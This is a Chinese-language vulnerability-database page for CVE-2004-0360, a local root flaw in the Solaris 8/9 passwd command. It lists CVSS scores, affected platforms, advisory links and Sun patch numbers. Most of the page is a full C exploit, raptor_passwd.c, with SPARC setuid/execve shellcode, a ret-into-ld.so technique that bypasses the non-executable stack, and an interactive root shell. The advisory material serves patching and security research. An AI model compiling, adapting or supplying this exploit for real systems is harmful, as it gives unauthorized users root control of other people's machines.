CVE-2004-0360
CVSS7.2
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:44:37
NMCOEPS    

[原文]Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users to gain privileges via unknown attack vectors.


[CNNVD]Sun Solaris未明passwd命令权限提升漏洞(CNNVD-200411-045)

        
        Solaris是一款由Sun Microsystems公司开发和维护的商业性质UNIX操作系统。
        Solaris系统中passwd(1)命令存在一个安全问题,本地攻击者可以利用这个漏洞获得root用户权限。
        目前没有相似漏洞细节提供。
        <*链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57454
        *>

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:9.0::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:9.0::sparc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0360
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0360
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-045
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107852274423414&w=2
(UNKNOWN)  BUGTRAQ  200470305 O-088: Sun passwd(1) Command Vulnerability
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57454
(UNKNOWN)  SUNALERT  57454
http://www.ciac.org/ciac/bulletins/o-088.shtml
(UNKNOWN)  CIAC  O-088
http://www.kb.cert.org/vuls/id/694782
(VENDOR_ADVISORY)  CERT-VN  VU#694782
http://www.securityfocus.com/bid/9757
(VENDOR_ADVISORY)  BID  9757
http://xforce.iss.net/xforce/xfdb/15327
(VENDOR_ADVISORY)  XF  solaris-passwd-gain-privileges(15327)

- 漏洞信息

Sun Solaris未明passwd命令权限提升漏洞
高危 未知
2004-11-23 00:00:00 2005-10-20 00:00:00
本地  
        
        Solaris是一款由Sun Microsystems公司开发和维护的商业性质UNIX操作系统。
        Solaris系统中passwd(1)命令存在一个安全问题,本地攻击者可以利用这个漏洞获得root用户权限。
        目前没有相似漏洞细节提供。
        <*链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57454
        *>

- 公告与补丁

        厂商补丁:
        Sun
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Sun Solaris 8.0 _x86:
        Sun Patch 108994-32
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108994&rev=32

        Sun Solaris 8.0:
        Sun Patch 108993-32
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108993&rev=32

        Sun Solaris 9.0 _x86:
        Sun Patch 114242-07
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=114242&rev=07

        Sun Solaris 9.0:
        Sun Patch 113476-11
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=113476&rev=11

- 漏洞信息 (23765)

Sun Solaris 8/9 Unspecified Passwd Local Root Compromise Vulnerability (EDBID:23765)
solaris local
2004-02-27 Verified
0 Marco Ivaldi
N/A [点击下载]
source: http://www.securityfocus.com/bid/9757/info

Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges. 

/*
 * $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users 
 * to gain privileges via unknown attack vectors (CAN-2004-0360).
 *
 * "Those of you lucky enough to have your lives, take them with you. However,
 * leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0
 *
 * This exploit uses the ret-into-ld.so technique, to effectively bypass the
 * non-executable stack protection (noexec_user_stack=1 in /etc/system). The
 * exploitation wasn't so straight-forward: sending parameters to passwd(1) 
 * is somewhat tricky, standard ret-into-stack doesn't seem to work properly 
 * for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory
 * references before reaching ret. Many thanks to Inode <inode@deadlocks.info>.
 *
 * Usage:
 * $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall
 * $ ./raptor_passwd <current password>
 * [...]
 * # id
 * uid=0(root) gid=1(other) egid=3(sys)
 * #
 *
 * Vulnerable platforms:
 * Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested]
 * Solaris 9 without 113476-11 [tested]
 */

#include <ctype.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	INFO1	"raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9"
#define	INFO2	"Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	VULN	"/usr/bin/passwd"	// target vulnerable program
#define	BUFSIZE	256			// size of the evil buffer
#define	VARSIZE	1024			// size of the evil env var
#define	FFSIZE	64 + 1			// size of the fake frame
#define	DUMMY	0xdeadbeef		// dummy memory address
#define	CMD	"id;uname -a;uptime;\n"	// execute upon exploitation

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* globals */
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_env(char *string);
void	check_addr(int addr, char *pattern);
int	find_pts(char **slave);
int	search_ldso(char *sym);
int	search_rwx_mem(void);
void	set_val(char *buf, int pos, int val);
void	shell(int fd);
int	read_prompt(int fd, char *buf, int size);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
	char	platform[256], release[256], cur_pass[256], tmp[256];
	int	i, offset, ff_addr, sc_addr, var_addr;
	int	plat_len, prog_len, rel;

	char	*arg[2] = {"foo", NULL};
	int	arg_len = 4, arg_pos = 1;

	int 	pid, cfd, newpts;
	char	*newpts_str;

	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
	int	ret = search_ldso("strcpy");
	int	rwx_mem = search_rwx_mem();

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc != 2) {
		fprintf(stderr, "usage: %s current_pass\n\n", argv[0]);
		exit(1);
	}
	sprintf(cur_pass, "%s\n", argv[1]);

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;
	buf[sizeof(buf) - 2] = '\n';

	/* prepare the evil env var */
	memset(var, 'B', sizeof(var));
	var[sizeof(var) - 1] = 0x0;

	/* prepare the fake frame */
	bzero(ff, sizeof(ff));

	/*
	 * saved %l registers
	 */
	set_val(ff, i  = 0, DUMMY);		/* %l0 */
	set_val(ff, i += 4, DUMMY);		/* %l1 */
	set_val(ff, i += 4, DUMMY);		/* %l2 */
	set_val(ff, i += 4, DUMMY);		/* %l3 */
	set_val(ff, i += 4, DUMMY);		/* %l4 */
	set_val(ff, i += 4, DUMMY);		/* %l5 */
	set_val(ff, i += 4, DUMMY);		/* %l6 */
	set_val(ff, i += 4, DUMMY);		/* %l7 */

	/*
	 * saved %i registers
	 */
	set_val(ff, i += 4, rwx_mem);		/* %i0: 1st arg to strcpy() */
	set_val(ff, i += 4, 0x42424242);	/* %i1: 2nd arg to strcpy() */
	set_val(ff, i += 4, DUMMY);		/* %i2 */
	set_val(ff, i += 4, DUMMY);		/* %i3 */
	set_val(ff, i += 4, DUMMY);		/* %i4 */
	set_val(ff, i += 4, DUMMY);		/* %i5 */
	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
	set_val(ff, i += 4, rwx_mem - 8);	/* %i7: return address */

	/* fill the envp, keeping padding */
	ff_addr = add_env(var);			/* var must be before ff! */
	sc_addr = add_env(ff);
	add_env(sc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(VULN) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the needed addresses */
	var_addr = sb - offset + arg_len;
	ff_addr += var_addr;
	sc_addr += var_addr;

	/* set fake frame's %i1 */
	set_val(ff, 36, sc_addr);		/* 2nd arg to strcpy() */

	/* check the addresses */
	check_addr(var_addr, "var_addr");
	check_addr(ff_addr, "ff_addr");

	/* fill the evil buffer */
	for (i = 0; i < BUFSIZE - 4; i += 4)
		set_val(buf, i, var_addr);
	/* may need to bruteforce the distance here */
	set_val(buf, 112, ff_addr);
	set_val(buf, 116, ret - 4);		/* strcpy(), after the save */

	/* fill the evil env var */
	for (i = 0; i < VARSIZE - 4; i += 4)
		set_val(var, i, var_addr);
	set_val(var, 0, 0xffffffff);		/* first byte must be 0xff! */

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
	fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
	
	/* find a free pts */
	cfd = find_pts(&newpts_str);

	/* fork() a new process */
	if ((pid = fork()) < 0) {
		perror("fork");
		exit(1);
	}

	/* parent process */
	if (pid) {

		sleep(1);

		/* wait for password prompt */
		if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
			fprintf(stderr, "Error: timeout waiting for prompt\n");
			exit(1);
		}
		if (!strstr(tmp, "ssword: ")) {
			fprintf(stderr, "Error: wrong prompt received\n");
			exit(1);
		}
		
		/* send the current password */
		write(cfd, cur_pass, strlen(cur_pass));
		usleep(500000);

		/* wait for password prompt */
		if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
			fprintf(stderr, "Error: timeout waiting for prompt\n");
			exit(1);
		}
		if (!strstr(tmp, "ssword: ")) {
			fprintf(stderr, "Error: wrong current_pass?\n");
			exit(1);
		}

		/* send the evil buffer */
		write(cfd, buf, strlen(buf));
		usleep(500000);
		
		/* got root? */
		if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
			fprintf(stderr, "Error: timeout waiting for shell\n");
			exit(1);
		}
		if (strstr(tmp, "ssword: ")) {
			fprintf(stderr, "Error: not vulnerable\n");
			exit(1);
		}
		if (!strstr(tmp, "# ")) {
			fprintf(stderr, "Something went wrong...\n");
			exit(1);
		}

		/* semi-interactive shell */
		shell(cfd);

	/* child process */
	} else {

		/* start new session and get rid of controlling terminal */
		if (setsid() < 0) {
			perror("setsid");
			exit(1);
		}

		/* open the new pts */
		if ((newpts = open(newpts_str, O_RDWR)) < 0) {
			perror("open");
			exit(1);
		}

		/* ninja terminal emulation */
		ioctl(newpts, I_PUSH, "ptem");
		ioctl(newpts, I_PUSH, "ldterm");

		/* close the child fd */
		close(cfd);

		/* duplicate stdin */
		if (dup2(newpts, 0) != 0) {
			perror("dup2");
			exit(1);
		}

		/* duplicate stdout */
		if (dup2(newpts, 1) != 1) {
			perror("dup2");
			exit(1);
		}

		/* duplicate stderr */
		if (dup2(newpts, 2) != 2) {
			perror("dup2");
			exit(1);
		}

		/* close the new pts */
		if (newpts > 2)
			close(newpts);

		/* run the vulnerable program */
		execve(VULN, arg, env);
		perror("execve");
	}

	exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return(env_len);
}

/*
 * check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes
 */
void check_addr(int addr, char *pattern)
{
	/* check for NULL byte (0x00) */
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
		exit(1);
	}

	/* check for EOT byte (0x04) */
	if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) ||
	    ((addr & 0xff0000) == 0x040000) || 
	    ((addr & 0xff000000) == 0x04000000)) {
		fprintf(stderr, "Error: %s contains a 0x04!\n", pattern);
		exit(1);
	}

	/* check for NL byte (0x0a) */
	if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) ||
	    ((addr & 0xff0000) == 0x0a0000) || 
	    ((addr & 0xff000000) == 0x0a000000)) {
		fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern);
		exit(1);
	}

	/* check for CR byte (0x0d) */
	if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) ||
	    ((addr & 0xff0000) == 0x0d0000) || 
	    ((addr & 0xff000000) == 0x0d000000)) {
		fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern);
		exit(1);
	}

	/* check for lowercase chars (0x61-0x7a) */
	if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) ||
	    (islower((addr & 0xff0000) >> 16)) || 
	    (islower((addr & 0xff000000) >> 24))) {
		fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern);
		exit(1);
	}
}

/*
 * find_pts(): find a free slave pseudo-tty
 */ 
int find_pts(char **slave)
{
	int		master;
	extern char	*ptsname();

	/* open master pseudo-tty device and get new slave pseudo-tty */
	if ((master = open("/dev/ptmx", O_RDWR)) > 0) {
		grantpt(master);
		unlockpt(master);
		*slave = ptsname(master);
		return(master);
	}

	return(-1);
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
	int		addr;
	void		*handle;
	Link_map	*lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
		perror("dlopen");
		exit(1);
	}

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
		perror("dlinfo");
		exit(1);
	}

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* close the executable object file */
	dlclose(handle);

	check_addr(addr - 4, sym);
	return(addr);
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
	int	fd;
	char	tmp[16];
	prmap_t	map;
	int	addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last RWX memory segment before stack (last - 1) */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_vaddr)
			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
				addr_old = addr;
				addr = map.pr_vaddr;
			}
	close(fd);

	/* add 4 to the exact address NULL bytes */
	if (!(addr_old & 0xff))
		addr_old |= 0x04;
	if (!(addr_old & 0xff00))
		addr_old |= 0x0400;

	return(addr_old);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote from kill bill: vol. 2 */
	fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n");
	fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) < 0) {
				perror("read");
				break;
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

/*
 * read_prompt(): non-blocking read from fd
 */
int read_prompt(int fd, char *buf, int size)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = 2;
	wait.tv_usec = 0;

	bzero(buf, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}
		

- 漏洞信息 (F35499)

raptor_passwd.c (PacketStormID:F35499)
2004-12-31 00:00:00
Marco Ivaldi  0xdeadbeef.info
exploit,local,root
solaris
CVE-2004-0360
[点击下载]

Local root exploit for a vulnerability in the passwd circ() function under Solaris/SPARC 8/9. This exploit uses the ret-into-ld.so technique, to effectively bypass the non-executable stack protection (noexec_user_stack=1 in /etc/system).

- 漏洞信息

4070
Solaris passwd Local Privilege Escalation
Local Access Required Attack Type Unknown
Impact Unknown
Exploit Unknown

- 漏洞描述

Solaris contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered by an unspecified flaw in the passwd command. This flaw may lead to a loss of confidentiality, integrity and/or availability.

- 时间线

2004-02-26 2004-02-26
2004-12-22 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sun Solaris Unspecified Passwd Local Root Compromise Vulnerability
Unknown 9757
No Yes
2004-02-27 12:00:00 2009-07-12 03:06:00
Discovery of this issue is credited to Tim Wort.

- 受影响的程序版本

Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc

- 漏洞讨论

Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT
product. This exploit is not otherwise publicly available or known
to be circulating in the wild.

Raptor has made the following exploit available:

- 解决方案

Sun has released patches for this issue:


Sun Solaris 9_x86

Sun Solaris 8_x86

Sun Solaris 8_sparc

Sun Solaris 9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站